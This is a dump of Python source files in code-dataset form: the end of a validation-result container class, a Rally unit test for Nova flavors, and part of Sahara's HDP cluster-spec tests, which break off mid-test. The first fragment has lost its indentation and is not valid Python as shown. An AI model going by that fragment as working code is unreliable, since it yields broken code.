# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
# WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals, division, absolute_import, print_function
from outputcontainer import OutputContainer
from validationresult import ValidationResult
class ValidationContainer(OutputContainer):
TYPE_INFO = 'info'
TYPE_WARN = 'warning'
TYPE_ERROR = 'error'
def __init__(self, wrapper, debug=False):
# List of validation results
self.results = []
super(ValidationContainer, self).__init__(wrapper, debug)
def add_result(self, restype, filename, linenumber, message):
self.results.append(ValidationResult(restype, filename, linenumber, message))
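    # Usage sketch (illustrative only; "container" stands for an instance the
    # plugin runner would construct with a real wrapper):
    #   container.add_result(ValidationContainer.TYPE_WARN,
    #                        "OEBPS/chapter01.xhtml", 42,
    #                        "img element is missing an alt attribute")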
| gpl-3.0 | -4,743,733,439,009,246,000 | 45.466667 | 89 | 0.761836 | false |
aplanas/rally | tests/unit/plugins/openstack/context/nova/test_flavors.py | 13 | 3947 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from novaclient import exceptions as nova_exceptions
from rally.plugins.openstack.context.nova import flavors
from tests.unit import test
CTX = "rally.plugins.openstack.context.nova"
class FlavorsGeneratorTestCase(test.TestCase):
def setUp(self):
super(FlavorsGeneratorTestCase, self).setUp()
self.context = {
"config": {
"flavors": [{
"name": "flavor_name",
"ram": 2048,
"disk": 10,
"vcpus": 3,
"ephemeral": 3,
"swap": 5,
"extra_specs": {
"key": "value"
}
}]
},
"admin": {
"endpoint": mock.MagicMock()
},
"task": mock.MagicMock(),
}
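        # self.context is a hand-rolled stand-in for the dict Rally hands to a
        # context plugin: plugin configuration under "config", admin
        # credentials under "admin", and the owning task under "task".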
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_setup(self, mock_clients):
# Setup and mock
mock_create = mock_clients().nova().flavors.create
mock_create().to_dict.return_value = {"flavor_key": "flavor_value"}
# Run
flavors_ctx = flavors.FlavorsGenerator(self.context)
flavors_ctx.setup()
# Assertions
self.assertEqual(flavors_ctx.context["flavors"],
{"flavor_name": {"flavor_key": "flavor_value"}})
mock_clients.assert_called_with(self.context["admin"]["endpoint"])
mock_create.assert_called_with(
name="flavor_name", ram=2048, vcpus=3,
disk=10, ephemeral=3, swap=5)
mock_create().set_keys.assert_called_with({"key": "value"})
mock_create().to_dict.assert_called_with()
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_setup_failexists(self, mock_clients):
# Setup and mock
new_context = copy.deepcopy(self.context)
new_context["flavors"] = {}
mock_flavor_create = mock_clients().nova().flavors.create
exception = nova_exceptions.Conflict("conflict")
mock_flavor_create.side_effect = exception
# Run
flavors_ctx = flavors.FlavorsGenerator(self.context)
flavors_ctx.setup()
# Assertions
self.assertEqual(new_context, flavors_ctx.context)
mock_clients.assert_called_with(self.context["admin"]["endpoint"])
mock_flavor_create.assert_called_once_with(
name="flavor_name", ram=2048, vcpus=3,
disk=10, ephemeral=3, swap=5)
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_cleanup(self, mock_clients):
# Setup and mock
real_context = {
"flavors": {
"flavor_name": {
"flavor_name": "flavor_name",
"id": "flavor_name"
}
},
"admin": {
"endpoint": mock.MagicMock()
},
"task": mock.MagicMock(),
}
# Run
flavors_ctx = flavors.FlavorsGenerator(real_context)
flavors_ctx.cleanup()
# Assertions
mock_clients.assert_called_with(real_context["admin"]["endpoint"])
mock_flavors_delete = mock_clients().nova().flavors.delete
mock_flavors_delete.assert_called_with("flavor_name")
| apache-2.0 | 6,756,423,582,459,452,000 | 31.619835 | 78 | 0.569546 | false |
citrix-openstack-build/sahara | sahara/tests/unit/plugins/hdp/test_clusterspec.py | 3 | 69753 | # Copyright (c) 2013 Hortonworks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import pkg_resources as pkg
from sahara.plugins import exceptions as ex
from sahara.plugins.hdp import clusterspec as cs
from sahara.plugins.hdp import hadoopserver
from sahara.plugins.hdp.versions.version_1_3_2 import services as s
from sahara.plugins import provisioning
from sahara.tests.unit import base as sahara_base
import sahara.tests.unit.plugins.hdp.hdp_test_base as base
from sahara.topology import topology_helper as th
from sahara import version
class TestCONF(object):
def __init__(self, enable_data_locality, enable_hypervisor_awareness):
self.enable_data_locality = enable_data_locality
self.enable_hypervisor_awareness = enable_hypervisor_awareness
@mock.patch("sahara.utils.openstack.nova.get_instance_info",
base.get_instance_info)
@mock.patch('sahara.plugins.hdp.versions.version_1_3_2.services.HdfsService.'
'_get_swift_properties',
return_value=[])
class ClusterSpecTest(sahara_base.SaharaTestCase):
service_validators = {}
def setUp(self):
super(ClusterSpecTest, self).setUp()
self.service_validators['HDFS'] = self._assert_hdfs
self.service_validators['MAPREDUCE'] = self._assert_mr
self.service_validators['GANGLIA'] = self._assert_ganglia
self.service_validators['NAGIOS'] = self._assert_nagios
self.service_validators['AMBARI'] = self._assert_ambari
self.service_validators['PIG'] = self._assert_pig
self.service_validators['HIVE'] = self._assert_hive
self.service_validators['HCATALOG'] = self._assert_hcatalog
self.service_validators['ZOOKEEPER'] = self._assert_zookeeper
self.service_validators['WEBHCAT'] = self._assert_webhcat
self.service_validators['OOZIE'] = self._assert_oozie
self.service_validators['SQOOP'] = self._assert_sqoop
self.service_validators['HBASE'] = self._assert_hbase
# TODO(jspeidel): test host manifest
def test_parse_default_with_cluster(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup('slave', [server2], ['TASKTRACKER',
'DATANODE'])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
self._assert_services(cluster_config.services)
self._assert_configurations(cluster_config.configurations)
node_groups = cluster_config.node_groups
self.assertEqual(2, len(node_groups))
self.assertIn('master', node_groups)
self.assertIn('slave', node_groups)
master_node_group = node_groups['master']
self.assertEqual('master', master_node_group.name)
self.assertEqual(9, len(master_node_group.components))
self.assertIn('NAMENODE', master_node_group.components)
self.assertIn('JOBTRACKER', master_node_group.components)
self.assertIn('SECONDARY_NAMENODE', master_node_group.components)
self.assertIn('GANGLIA_SERVER', master_node_group.components)
self.assertIn('GANGLIA_MONITOR', master_node_group.components)
self.assertIn('NAGIOS_SERVER', master_node_group.components)
self.assertIn('AMBARI_SERVER', master_node_group.components)
self.assertIn('AMBARI_AGENT', master_node_group.components)
self.assertIn('HISTORYSERVER', master_node_group.components)
slave_node_group = node_groups['slave']
self.assertEqual('slave', slave_node_group.name)
self.assertIn('TASKTRACKER', slave_node_group.components)
return cluster_config
def test_determine_component_hosts(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('ambari_machine', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'slave', '11111', 3, '222.22.2222',
'333.22.2222')
server3 = base.TestServer('host3', 'slave', '11111', 3, '222.22.2223',
'333.22.2223')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"NAGIOS_SERVER", "AMBARI_SERVER"])
node_group2 = TestNodeGroup(
'slave', [server2], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
node_group3 = TestNodeGroup(
'slave2', [server3], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
cluster = base.TestCluster([node_group1, node_group2, node_group3])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
hosts = cluster_config.determine_component_hosts('AMBARI_SERVER')
self.assertEqual(1, len(hosts))
self.assertEqual('ambari_machine', hosts.pop().fqdn())
hosts = cluster_config.determine_component_hosts('DATANODE')
self.assertEqual(2, len(hosts))
datanodes = set([server2.fqdn(), server3.fqdn()])
host_fqdn = set([hosts.pop().fqdn(), hosts.pop().fqdn()])
# test intersection is both servers
self.assertEqual(datanodes, host_fqdn & datanodes)
def test_finalize_configuration(self, patched):
patched.return_value = [{'name': 'swift.prop1',
'value': 'swift_prop_value'},
{'name': 'swift.prop2',
'value': 'swift_prop_value2'}]
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
master_host = base.TestServer(
'master.novalocal', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
jt_host = base.TestServer(
'jt_host.novalocal', 'jt', '11111', 3,
'111.11.2222', '222.11.2222')
nn_host = base.TestServer(
'nn_host.novalocal', 'nn', '11111', 3,
'111.11.3333', '222.11.3333')
snn_host = base.TestServer(
'snn_host.novalocal', 'jt', '11111', 3,
'111.11.4444', '222.11.4444')
hive_host = base.TestServer(
'hive_host.novalocal', 'hive', '11111', 3,
'111.11.5555', '222.11.5555')
hive_ms_host = base.TestServer(
'hive_ms_host.novalocal', 'hive_ms', '11111', 3,
'111.11.6666', '222.11.6666')
hive_mysql_host = base.TestServer(
'hive_mysql_host.novalocal', 'hive_mysql', '11111', 3,
'111.11.7777', '222.11.7777')
hcat_host = base.TestServer(
'hcat_host.novalocal', 'hcat', '11111', 3,
'111.11.8888', '222.11.8888')
zk1_host = base.TestServer(
'zk1_host.novalocal', 'zk1', '11111', 3,
'111.11.9999', '222.11.9999')
zk2_host = base.TestServer(
'zk2_host.novalocal', 'zk2', '11112', 3,
'111.11.9990', '222.11.9990')
oozie_host = base.TestServer(
'oozie_host.novalocal', 'oozie', '11111', 3,
'111.11.9999', '222.11.9999')
slave_host = base.TestServer(
'slave1.novalocal', 'slave', '11111', 3,
'222.22.6666', '333.22.6666')
master_ng = TestNodeGroup(
'master', [master_host], ["GANGLIA_SERVER",
"GANGLIA_MONITOR",
"NAGIOIS_SERVER",
"AMBARI_SERVER",
"AMBARI_AGENT"])
jt_ng = TestNodeGroup(
'jt', [jt_host], ["JOBTRACKER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
nn_ng = TestNodeGroup(
'nn', [nn_host], ["NAMENODE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
snn_ng = TestNodeGroup(
'snn', [snn_host], ["SECONDARY_NAMENODE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_ng = TestNodeGroup(
'hive', [hive_host], ["HIVE_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_ms_ng = TestNodeGroup(
'meta', [hive_ms_host], ["HIVE_METASTORE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_mysql_ng = TestNodeGroup(
'mysql', [hive_mysql_host], ["MYSQL_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hcat_ng = TestNodeGroup(
'hcat', [hcat_host], ["WEBHCAT_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
zk1_ng = TestNodeGroup(
'zk1', [zk1_host], ["ZOOKEEPER_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
zk2_ng = TestNodeGroup(
'zk2', [zk2_host], ["ZOOKEEPER_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
oozie_ng = TestNodeGroup(
'oozie', [oozie_host], ["OOZIE_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
slave_ng = TestNodeGroup(
'slave', [slave_host], ["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR", "HDFS_CLIENT",
"MAPREDUCE_CLIENT", "OOZIE_CLIENT",
"AMBARI_AGENT"])
user_input_config = TestUserInputConfig(
'core-site', 'cluster', 'fs.default.name')
user_input = provisioning.UserInput(
user_input_config, 'hdfs://nn_dif_host.novalocal:8020')
cluster = base.TestCluster([master_ng, jt_ng, nn_ng, snn_ng, hive_ng,
hive_ms_ng, hive_mysql_ng,
hcat_ng, zk1_ng, zk2_ng, oozie_ng,
slave_ng])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
config = cluster_config.configurations
# for this value, validating that user inputs override configured
# values, whether they are processed by runtime or not
self.assertEqual(config['core-site']['fs.default.name'],
'hdfs://nn_dif_host.novalocal:8020')
self.assertEqual(config['mapred-site']['mapred.job.tracker'],
'jt_host.novalocal:50300')
self.assertEqual(config['mapred-site']
['mapred.job.tracker.http.address'],
'jt_host.novalocal:50030')
self.assertEqual(config['mapred-site']
['mapreduce.history.server.http.address'],
'jt_host.novalocal:51111')
self.assertEqual(config['hdfs-site']['dfs.http.address'],
'nn_host.novalocal:50070')
self.assertEqual(config['hdfs-site']['dfs.secondary.http.address'],
'snn_host.novalocal:50090')
self.assertEqual(config['hdfs-site']['dfs.https.address'],
'nn_host.novalocal:50470')
self.assertEqual(config['global']['hive_hostname'],
'hive_host.novalocal')
self.assertEqual(config['core-site']['hadoop.proxyuser.hive.hosts'],
'hive_host.novalocal')
self.assertEqual(config['hive-site']
['javax.jdo.option.ConnectionURL'],
'jdbc:mysql://hive_host.novalocal/hive?'
'createDatabaseIfNotExist=true')
self.assertEqual(config['hive-site']['hive.metastore.uris'],
'thrift://hive_ms_host.novalocal:9083')
self.assertTrue(
'hive.metastore.uris=thrift://hive_ms_host.novalocal:9083' in
config['webhcat-site']['templeton.hive.properties'])
self.assertEqual(config['global']['hive_jdbc_connection_url'],
'jdbc:mysql://hive_mysql_host.novalocal/hive?'
'createDatabaseIfNotExist=true')
self.assertEqual(config['core-site']['hadoop.proxyuser.hcat.hosts'],
'hcat_host.novalocal')
self.assertEqual(set(
config['webhcat-site']['templeton.zookeeper.hosts'].split(',')),
set(['zk1_host.novalocal:2181', 'zk2_host.novalocal:2181']))
self.assertEqual(config['oozie-site']['oozie.base.url'],
'http://oozie_host.novalocal:11000/oozie')
self.assertEqual(config['global']['oozie_hostname'],
'oozie_host.novalocal')
self.assertEqual(config['core-site']['hadoop.proxyuser.oozie.hosts'],
'oozie_host.novalocal,222.11.9999,111.11.9999')
# test swift properties
self.assertEqual('swift_prop_value',
config['core-site']['swift.prop1'])
self.assertEqual('swift_prop_value2',
config['core-site']['swift.prop2'])
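    # The assertions above cover the two jobs of finalize-time processing:
    # substituting the FQDNs of the node groups hosting each master component
    # into host/port style properties, and letting explicit user inputs
    # (fs.default.name here) override the template defaults.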
def test__determine_deployed_services(self, nova_mock):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
master_host = base.TestServer(
'master.novalocal', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
jt_host = base.TestServer(
'jt_host.novalocal', 'jt', '11111', 3,
'111.11.2222', '222.11.2222')
nn_host = base.TestServer(
'nn_host.novalocal', 'nn', '11111', 3,
'111.11.3333', '222.11.3333')
snn_host = base.TestServer(
'snn_host.novalocal', 'jt', '11111', 3,
'111.11.4444', '222.11.4444')
slave_host = base.TestServer(
'slave1.novalocal', 'slave', '11111', 3,
'222.22.6666', '333.22.6666')
master_ng = TestNodeGroup(
'master', [master_host],
['GANGLIA_SERVER',
'GANGLIA_MONITOR', 'NAGIOS_SERVER',
'AMBARI_SERVER', 'AMBARI_AGENT'])
jt_ng = TestNodeGroup('jt', [jt_host], ["JOBTRACKER",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
nn_ng = TestNodeGroup('nn', [nn_host], ["NAMENODE",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
snn_ng = TestNodeGroup('snn', [snn_host], ["SECONDARY_NAMENODE",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
slave_ng = TestNodeGroup(
'slave', [slave_host],
["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR", "HDFS_CLIENT", "MAPREDUCE_CLIENT",
"AMBARI_AGENT"])
cluster = base.TestCluster([master_ng, jt_ng, nn_ng,
snn_ng, slave_ng])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
services = cluster_config.services
for service in services:
if service.name in ['HDFS', 'MAPREDUCE', 'GANGLIA',
'AMBARI', 'NAGIOS']:
self.assertTrue(service.deployed)
else:
self.assertFalse(service.deployed)
def test_ambari_rpm_path(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_spec = cs.ClusterSpec(cluster_config_file)
ambari_config = cluster_spec.configurations['ambari']
rpm = ambari_config.get('rpm', None)
self.assertEqual('http://s3.amazonaws.com/'
'public-repo-1.hortonworks.com/ambari/centos6/'
'1.x/updates/1.6.0/ambari.repo', rpm)
def test_default_ambari_rpm_path(self, patched):
self.assertEqual('http://s3.amazonaws.com/'
'public-repo-1.hortonworks.com/ambari/centos6/'
'1.x/updates/1.6.0/ambari.repo',
hadoopserver.AMBARI_RPM)
def test_parse_default(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
self._assert_services(cluster_config.services)
self._assert_configurations(cluster_config.configurations)
node_groups = cluster_config.node_groups
self.assertEqual(2, len(node_groups))
master_node_group = node_groups['master']
self.assertEqual('master', master_node_group.name)
self.assertIsNone(master_node_group.predicate)
self.assertEqual('1', master_node_group.cardinality)
self.assertEqual(6, len(master_node_group.components))
self.assertIn('NAMENODE', master_node_group.components)
self.assertIn('JOBTRACKER', master_node_group.components)
self.assertIn('SECONDARY_NAMENODE', master_node_group.components)
self.assertIn('GANGLIA_SERVER', master_node_group.components)
self.assertIn('NAGIOS_SERVER', master_node_group.components)
self.assertIn('AMBARI_SERVER', master_node_group.components)
slave_node_group = node_groups['slave']
self.assertEqual('slave', slave_node_group.name)
self.assertIsNone(slave_node_group.predicate)
self.assertEqual('1+', slave_node_group.cardinality)
self.assertEqual(4, len(slave_node_group.components))
self.assertIn('DATANODE', slave_node_group.components)
self.assertIn('TASKTRACKER', slave_node_group.components)
self.assertIn('HDFS_CLIENT', slave_node_group.components)
self.assertIn('MAPREDUCE_CLIENT', slave_node_group.components)
return cluster_config
def test_ambari_rpm(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
self._assert_configurations(cluster_config.configurations)
ambari_config = cluster_config.configurations['ambari']
        self.assertIsNotNone(ambari_config.get('rpm', None),
                             'no rpm uri found')
def test_normalize(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster = cluster_config.normalize()
configs = cluster.cluster_configs
contains_dfs_datanode_http_address = False
contains_mapred_jobtracker_taskScheduler = False
contains_dfs_include = False
for entry in configs:
config = entry.config
# assert some random configurations across targets
if config.name == 'dfs.datanode.http.address':
contains_dfs_datanode_http_address = True
self.assertEqual('string', config.type)
self.assertEqual('0.0.0.0:50075', config.default_value)
self.assertEqual('HDFS', config.applicable_target)
if config.name == 'mapred.jobtracker.taskScheduler':
contains_mapred_jobtracker_taskScheduler = True
self.assertEqual('string', config.type)
self.assertEqual(
'org.apache.hadoop.mapred.CapacityTaskScheduler',
config.default_value)
self.assertEqual('MAPREDUCE',
config.applicable_target)
if config.name == 'dfs_include':
contains_dfs_include = True
self.assertEqual('string', config.type)
self.assertEqual('dfs.include', config.default_value)
self.assertEqual('HDFS', config.applicable_target)
# print 'Config: name: {0}, type:{1},
# default value:{2}, target:{3}, Value:{4}'.format(
# config.name, config.type,
# config.default_value,
# config.applicable_target, entry.value)
self.assertTrue(contains_dfs_datanode_http_address)
self.assertTrue(contains_mapred_jobtracker_taskScheduler)
self.assertTrue(contains_dfs_include)
node_groups = cluster.node_groups
self.assertEqual(2, len(node_groups))
contains_master_group = False
contains_slave_group = False
for i in range(2):
node_group = node_groups[i]
components = node_group.node_processes
if node_group.name == "master":
contains_master_group = True
self.assertEqual(6, len(components))
self.assertIn('NAMENODE', components)
self.assertIn('JOBTRACKER', components)
self.assertIn('SECONDARY_NAMENODE', components)
self.assertIn('GANGLIA_SERVER', components)
self.assertIn('NAGIOS_SERVER', components)
self.assertIn('AMBARI_SERVER', components)
# TODO(jspeidel): node configs
# TODO(jspeidel): vm_requirements
elif node_group.name == 'slave':
contains_slave_group = True
self.assertEqual(4, len(components))
self.assertIn('DATANODE', components)
self.assertIn('TASKTRACKER', components)
self.assertIn('HDFS_CLIENT', components)
self.assertIn('MAPREDUCE_CLIENT', components)
# TODO(jspeidel): node configs
# TODO(jspeidel): vm requirements
else:
self.fail('Unexpected node group: {0}'.format(node_group.name))
self.assertTrue(contains_master_group)
self.assertTrue(contains_slave_group)
def test_existing_config_item_in_top_level_within_blueprint(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig(
'global', 'general', 'fs_checkpoint_dir')
user_input = provisioning.UserInput(user_input_config,
'/some/new/path')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
self.assertEqual('/some/new/path', cluster_config.configurations
['global']['fs_checkpoint_dir'])
def test_new_config_item_in_top_level_within_blueprint(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig(
'global', 'general', 'new_property')
user_input = provisioning.UserInput(user_input_config, 'foo')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
self.assertEqual(
'foo', cluster_config.configurations['global']['new_property'])
def test_topology_configuration_no_hypervisor(self, patched):
s_conf = s.CONF
th_conf = th.CONF
try:
s.CONF = TestCONF(True, False)
th.CONF = TestCONF(True, False)
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
# core-site
self.assertEqual(
'org.apache.hadoop.net.NetworkTopology',
cluster_config.configurations['core-site']
['net.topology.impl'])
self.assertEqual(
'true',
cluster_config.configurations['core-site']
['net.topology.nodegroup.aware'])
self.assertEqual(
'org.apache.hadoop.hdfs.server.namenode.'
'BlockPlacementPolicyWithNodeGroup',
cluster_config.configurations['core-site']
['dfs.block.replicator.classname'])
self.assertEqual(
'true',
cluster_config.configurations['core-site']
['fs.swift.service.sahara.location-aware'])
self.assertEqual(
'org.apache.hadoop.net.ScriptBasedMapping',
cluster_config.configurations['core-site']
['topology.node.switch.mapping.impl'])
self.assertEqual(
'/etc/hadoop/conf/topology.sh',
cluster_config.configurations['core-site']
['topology.script.file.name'])
# mapred-site
self.assertEqual(
'true',
cluster_config.configurations['mapred-site']
['mapred.jobtracker.nodegroup.aware'])
self.assertEqual(
'3',
cluster_config.configurations['mapred-site']
['mapred.task.cache.levels'])
self.assertEqual(
'org.apache.hadoop.mapred.JobSchedulableWithNodeGroup',
cluster_config.configurations['mapred-site']
['mapred.jobtracker.jobSchedulable'])
finally:
s.CONF = s_conf
th.CONF = th_conf
def test_topology_configuration_with_hypervisor(self, patched):
s_conf = s.CONF
try:
s.CONF = TestCONF(True, True)
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
# core-site
self.assertEqual(
'org.apache.hadoop.net.NetworkTopologyWithNodeGroup',
cluster_config.configurations['core-site']
['net.topology.impl'])
finally:
s.CONF = s_conf
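    # Note: this test differs from test_topology_configuration_no_hypervisor
    # only in enabling hypervisor awareness on TestCONF, which switches the
    # expected net.topology.impl to NetworkTopologyWithNodeGroup.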
def test_update_ambari_admin_user(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.user')
user_input = provisioning.UserInput(user_input_config, 'new-user')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-user', users[0].name)
def test_update_ambari_admin_password(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.password')
user_input = provisioning.UserInput(user_input_config, 'new-pwd')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
